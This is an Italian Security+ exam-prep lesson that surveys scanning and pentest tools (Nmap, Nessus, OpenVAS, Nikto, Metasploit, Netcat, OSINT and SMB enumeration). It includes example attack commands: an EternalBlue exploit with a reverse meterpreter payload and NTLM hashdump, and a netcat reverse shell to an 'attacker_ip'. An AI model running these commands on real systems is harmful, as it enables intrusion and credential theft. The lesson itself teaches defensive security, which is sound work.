Strumenti di scansione comuni: Nessus, OpenVAS, Nmap
Acquisisca familiarità pratica con gli strumenti standard del settore per individuare host, scansionare porte e identificare vulnerabilità.
Strumenti di scansione comuni: Nessus, OpenVAS, Nmap è una lezione Security+ Academy gratuita su CoddyKit. Questa è la lezione 2 di 4. Puoi leggere la lezione completa qui gratuitamente — poi esercitati direttamente nel browser con un editor di codice integrato e un tutor IA disponibile 24/7. Fa parte del percorso di apprendimento Security+ Academy, e i tuoi progressi si sincronizzano tra il web e l'app CoddyKit. Il corso Security+ Academy include 4 lezioni in totale.
L'ecosistema degli strumenti di scansione
I professionisti della sicurezza utilizzano diversi strumenti di scansione per scopi differenti: individuazione degli host, scansione delle porte, enumerazione dei servizi, rilevamento del sistema operativo, identificazione delle vulnerabilità e test delle applicazioni Web. Security+ richiede familiarità con gli strumenti più utilizzati in ciascuna categoria. Comprendere cosa fa ogni strumento e cosa non è in grado di fare aiuta a selezionare quello giusto per una determinata attività e a interpretare correttamente i risultati. I risultati ottenuti da più strumenti complementari offrono una copertura più completa rispetto a quella di un singolo strumento.
Nmap: il Network Mapper
Nmap (Network Mapper) è lo strumento open source più utilizzato per l'individuazione delle reti e gli audit di sicurezza. Può individuare gli host attivi, enumerare le porte aperte, rilevare i servizi in esecuzione e le relative versioni e identificare il sistema operativo. Nmap utilizza diverse tecniche di scansione, tra cui la scansione SYN (quella predefinita, rapida e relativamente furtiva), TCP Connect (handshake completo, più rumorosa ma non richiede privilegi root), la scansione UDP e la scansione delle versioni. Include Nmap Scripting Engine (NSE), che fornisce centinaia di script per il rilevamento delle vulnerabilità, il brute force e lo sfruttamento.
# Common Nmap scan types:
nmap -sS 192.168.1.0/24 # SYN scan (fast, stealthy)
nmap -sT 192.168.1.10 # TCP connect scan
nmap -sU -p 53,67,161 target # UDP scan specific ports
nmap -sV 192.168.1.10 # version detection
nmap -O 192.168.1.10 # OS detection
nmap -A 192.168.1.10 # aggressive: -sV -O -sC --traceroute
nmap -p- 192.168.1.10 # scan all 65535 ports
nmap --script vuln 192.168.1.10 # run vulnerability scriptsOutput e interpretazione di Nmap
Interpretare correttamente l'output di Nmap è una competenza essenziale. Ogni riga rappresenta una porta con il relativo stato (open: un servizio è in ascolto; closed: l'host ha risposto, ma non c'è alcun servizio in ascolto; filtered: nessuna risposta o destinazione ICMP irraggiungibile, probabilmente a causa di un firewall), il protocollo e il servizio o la versione rilevati. Le porte aperte rappresentano una potenziale superficie di attacco. Porte aperte inattese su un host possono indicare una compromissione o servizi non autorizzati. I flag -oN, -oX e -oG salvano l'output nei formati normale, XML e analizzabile con grep; salvare l'output è fondamentale per la documentazione e il confronto tra scansioni eseguite nel tempo.
# Sample Nmap output:
# PORT STATE SERVICE VERSION
# 22/tcp open ssh OpenSSH 8.2p1 Ubuntu
# 80/tcp open http Apache 2.4.41
# 443/tcp open ssl/http Apache 2.4.41
# 8080/tcp open http Jetty 9.4.39
# 3306/tcp open mysql MySQL 8.0.26
# 3306 open to internet = HIGH RISK (should be internal only)
# Save output:
nmap -sV 192.168.1.0/24 -oN scan_results.txt -oX scan_results.xmlNessus: scanner aziendale delle vulnerabilità
Nessus (di Tenable) è lo scanner commerciale delle vulnerabilità più diffuso. Utilizza un'architettura basata su plugin con oltre 100.000 plugin che coprono CVE, controlli di configurazione, benchmark di conformità (CIS, DISA STIG) e rilevamento di malware. Nessus esegue scansioni con credenziali accedendo ai sistemi con le credenziali fornite per verificare le versioni dei software installati, le chiavi del registro e i file di configurazione, producendo risultati molto più accurati rispetto all'analisi di rete senza credenziali. Nessus genera report dettagliati con punteggi CVSS, descrizioni delle vulnerabilità e raccomandazioni per la correzione. La versione gratuita Nessus Essentials esegue scansioni su un massimo di 16 indirizzi IP.
# Nessus scan configuration key settings:
# Scan type: Advanced Scan (most control)
# Credentials: Windows (domain admin), SSH (root or sudo)
# Plugins: enable 'Safe Checks' to avoid crashing systems
# Schedule: define scan window (off-hours recommended)
# Nessus output rating:
# Critical (CVSS 9.0-10.0): remote code execution, critical data exposure
# High (CVSS 7.0-8.9): privilege escalation, severe data exposure
# Medium (CVSS 4.0-6.9): local privilege escalation, information disclosure
# Low (CVSS 0.1-3.9): minimal impact, hardening issues
# Info: configuration data, no immediate riskOpenVAS: scansione open source delle vulnerabilità
OpenVAS (Open Vulnerability Assessment System) è uno scanner gratuito e open source delle vulnerabilità, mantenuto da Greenbone Networks. È il fork supportato dalla community dell'originale Nessus, prima della sua trasformazione in prodotto commerciale. OpenVAS utilizza gli NVT (Network Vulnerability Tests), analoghi ai plugin di Nessus. Greenbone Community Edition (GCE) fornisce un'interfaccia di gestione basata sul Web (Greenbone Security Assistant). OpenVAS è diffuso negli ambienti in cui i costi delle licenze impediscono l'utilizzo di strumenti commerciali. Offre un insieme di funzionalità più ampio rispetto a Nmap, pur rimanendo gratuito, e per questo è una scelta comune per le organizzazioni più piccole, gli ambienti accademici e i laboratori di sicurezza.
# OpenVAS quick start:
# Install via Kali Linux or Docker:
gvm-setup # initial setup (takes time to download feeds)
gvm-start # start OpenVAS services
# Create a scan in the web UI (https://localhost:9392):
# 1. Create Target (host IPs, credentials)
# 2. Create Scan Config (Full and Fast, or Full Deep)
# 3. Create Task -> assign target + config
# 4. Start Task -> review Results report
# CLI scan:
openvas-cli --host=127.0.0.1 --user=admin --xml="<start_task>..."Nikto: scanner delle vulnerabilità dei server Web
Nikto è uno scanner open source per server Web che verifica la presenza di file pericolosi, versioni obsolete dei software, problemi di configurazione del server e vulnerabilità Web comuni. Esegue test per oltre 6.700 problemi noti, tra cui metodi HTTP non sicuri, intestazioni di sicurezza mancanti, interfacce di amministrazione esposte, credenziali predefinite e vulnerabilità CGI comuni. Nikto è rumoroso e non è progettato per operare in modo furtivo: genera una quantità significativa di log sul sistema obiettivo. Integra gli scanner a livello di rete fornendo controlli specifici per il Web che Nessus e OpenVAS potrebbero non eseguire in profondità. Utilizzi Nikto esclusivamente su sistemi per i quali dispone dell'autorizzazione al test.
# Nikto web scan examples:
nikto -h 192.168.1.10 # basic scan
nikto -h https://192.168.1.10 # HTTPS target
nikto -h 192.168.1.10 -p 8080,8443 # multiple ports
nikto -h 192.168.1.10 -o report.html -Format html # save report
# Nikto checks include:
# - Missing X-Frame-Options, Content-Security-Policy headers
# - Apache/nginx version disclosure
# - /admin, /phpinfo.php, /.git/ exposed
# - Default test files (phpMyAdmin, WebDAV)Metasploit Framework
Metasploit Framework è la piattaforma di test di penetrazione più utilizzata e fornisce un database di exploit, payload, moduli ausiliari e strumenti post-exploitation. Chi si prepara a Security+ dovrebbe comprendere che cos'è Metasploit e quale ruolo svolge in un test di penetrazione, anche se non lo ha mai utilizzato. I moduli di Metasploit includono: exploit (codice che sfrutta una vulnerabilità), payload (shellcode eseguito dopo lo sfruttamento riuscito, come Meterpreter), moduli ausiliari (per scansione, fuzzing ed enumerazione senza sfruttamento) e moduli post (per l'escalation dei privilegi, l'estrazione delle credenziali e il movimento laterale dopo l'accesso iniziale).
# Metasploit Framework basic workflow:
msfconsole # start Metasploit
search eternalblue # search for exploit
use exploit/windows/smb/ms17_010_eternalblue
info # show exploit details
set RHOSTS 192.168.1.10 # target IP
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.5 # attacker IP
run # execute exploit
# After shell:
meterpreter> sysinfo
meterpreter> getuid
meterpreter> hashdump # dump NTLM hashesNetcat: il coltellino svizzero
Netcat (nc) è un'utility semplice ma versatile che legge e scrive dati attraverso connessioni di rete usando TCP o UDP. Ha innumerevoli applicazioni nell'ambito della sicurezza: stabilire reverse shell da host compromessi, trasferire file tra segmenti di rete, eseguire scansioni delle porte, creare semplici listener di rete per i test e acquisire banner per identificare le versioni dei servizi. La sua semplicità e la disponibilità su quasi tutti i sistemi Linux ne fanno uno strumento utilizzato di frequente sia nelle attività di amministrazione legittime sia nei toolkit degli attaccanti; per questo è importante conoscerlo anche dal punto di vista del rilevamento.
# Netcat usage examples:
# Banner grabbing:
nc -v 192.168.1.10 22 # grab SSH banner
nc -v 192.168.1.10 80 # grab HTTP banner
# Port scan:
nc -zv 192.168.1.10 1-1024 2>&1 | grep succeeded
# Reverse shell (attacker listens, victim connects out):
# Attacker: nc -lvnp 4444
# Victim: nc attacker_ip 4444 -e /bin/bash
# File transfer:
# Receiver: nc -lvnp 9999 > received_file.txt
# Sender: nc receiver_ip 9999 < file.txtRecon-ng e strumenti OSINT
Recon-ng è un framework di ricognizione web progettato per la raccolta di OSINT (Open Source Intelligence). Utilizza moduli che interrogano fonti pubbliche — Shodan, Bing, HaveIBeenPwned, record DNS, LinkedIn, WHOIS e log di certificate transparency — per raccogliere informazioni su un obiettivo prima dell'inizio di qualsiasi scansione attiva. La fase di ricognizione di un test di penetrazione in genere inizia con l'OSINT per delineare la topologia di rete dell'obiettivo, i nomi dei dipendenti, i formati degli indirizzi e-mail, le tecnologie utilizzate e gli asset esposti pubblicamente. Un'attività OSINT efficace può rivelare percorsi di attacco che richiederebbero molto più tempo per essere individuati con la sola scansione attiva.
# OSINT tool chain for reconnaissance:
# 1. WHOIS: domain registration details
whois example.com
# 2. DNS enumeration:
dnsrecon -d example.com -t std
fiercer --domain example.com
# 3. Shodan: internet-facing device search
# shodan search 'org:"Target Corp" port:3389'
# 4. theHarvester: emails, subdomains, names
theharvester -d example.com -l 500 -b google,linkedin
# 5. Certificate transparency:
crt.sh/?q=%.example.com (reveals subdomains via certs)Enumerazione della rete con Enum4linux
Enum4linux enumera le informazioni dagli host Windows e dai server Samba (SMB Linux) utilizzando sessioni nulle e MSRPC. Estrae nomi utente, appartenenze ai gruppi, condivisioni, criteri per le password e informazioni sul workgroup. Durante i test di penetrazione interni, enum4linux può rivelare rapidamente gli account utente disponibili per il password spraying e la struttura delle condivisioni di un ambiente. Le versioni moderne di Windows limitano per impostazione predefinita l'accesso tramite sessioni nulle, ma gli ambienti configurati in modo errato spesso espongono una quantità significativa di informazioni. Funzionalità simili sono disponibili in samrdump.py di Impacket e in CrackMapExec per l'enumerazione autenticata.
# Enum4linux Windows enumeration:
enum4linux -a 192.168.1.10 # all enumeration
enum4linux -U 192.168.1.10 # users only
enum4linux -S 192.168.1.10 # shares only
# CrackMapExec (authenticated enumeration):
crackmapexec smb 192.168.1.0/24 -u admin -p Password1
crackmapexec smb 192.168.1.10 --users
crackmapexec smb 192.168.1.10 --shares
# Nmap SMB scripts:
nmap --script smb-enum-users 192.168.1.10
nmap --script smb-os-discovery 192.168.1.10Selezionare lo strumento giusto per ogni attività
I professionisti della sicurezza scelgono gli strumenti in base alle attività. Per il rilevamento degli host e la scansione delle porte: Nmap. Per l'identificazione delle vulnerabilità su larga scala: Nessus (commerciale) o OpenVAS (gratuito). Per le vulnerabilità dei server web: Nikto. Per gli attacchi alle applicazioni web: Burp Suite. Per lo sfruttamento: Metasploit. Per la ricognizione OSINT: Recon-ng, theHarvester, Shodan. Per l'analisi del traffico di rete: Wireshark, tcpdump. Per gli attacchi wireless: suite Aircrack-ng. L'esame Security+ verifica la conoscenza concettuale di questi strumenti: dovrebbe sapere a cosa serve ciascuno, anche senza averne provato ogni singolo strumento direttamente.
Verifica rapida
Verifichi la Sua comprensione dei concetti di CompTIA Security+ (SY0-701) trattati in questa lezione.
Riepilogo della lezione
In questa lezione ha imparato che Nmap è la base per il rilevamento degli host, la scansione delle porte e il rilevamento delle versioni, con un potente motore di scripting per funzionalità aggiuntive; Nessus e OpenVAS eseguono scansioni complete delle vulnerabilità rispetto ai CVE noti, utilizzando l'accesso autenticato per ottenere la massima accuratezza; e Metasploit fornisce un framework di exploit che consente ai penetration tester di confermare che le vulnerabilità siano effettivamente sfruttabili e di dimostrare l'impatto reale di un attacco. Ora esamineremo l'intero ciclo di vita di un test di penetrazione, dalla ricognizione alla stesura del report.
Domande Frequenti
La lezione «Strumenti di scansione comuni: Nessus, OpenVAS, Nmap» è gratuita?
Sì — il testo completo di «Strumenti di scansione comuni: Nessus, OpenVAS, Nmap» è gratuito qui sul web. Per esercitarvi in modo interattivo (un editor di codice integrato e un tutor IA 24/7) e sbloccare il resto del corso Security+ Academy, passa a CoddyKit PRO. Il corso Security+ Academy include 4 lezioni in totale.
Cosa imparerò in «Strumenti di scansione comuni: Nessus, OpenVAS, Nmap»?
Acquisisca familiarità pratica con gli strumenti standard del settore per individuare host, scansionare porte e identificare vulnerabilità. Eserciti Security+ Academy con codice pratico che esegui direttamente nel browser, e un tutor IA 24/7 risponde alle tue domande mentre lavori sulla lezione.
Ho bisogno di esperienza per iniziare Security+ Academy?
Non è richiesta alcuna esperienza precedente. Security+ Academy su CoddyKit è strutturato per principianti e studenti avanzati, quindi puoi iniziare da qui o dall'inizio e procedere al tuo ritmo. Questa è la lezione 2 di 4.
Quanto tempo richiede la lezione «Strumenti di scansione comuni: Nessus, OpenVAS, Nmap»?
La maggior parte delle lezioni CoddyKit richiede circa 5–10 minuti. Ogni lezione è breve e interattiva, quindi fai progressi costanti e riprendi esattamente da dove hai lasciato su web e app.
Posso scrivere ed eseguire codice in questa lezione Security+ Academy?
Sì. Ogni lezione Security+ Academy include un editor di codice integrato, quindi scrivi ed esegui codice reale direttamente nel tuo browser e ricevi feedback istantaneo dall'IA — nessuna configurazione locale necessaria.
Tutte le lezioni di questo corso
- Scansione delle vulnerabilità e penetration testing
- Strumenti di scansione comuni: Nessus, OpenVAS, Nmap
- Fasi del penetration test: dalla ricognizione al report
- Punteggio CVSS e prioritizzazione delle vulnerabilità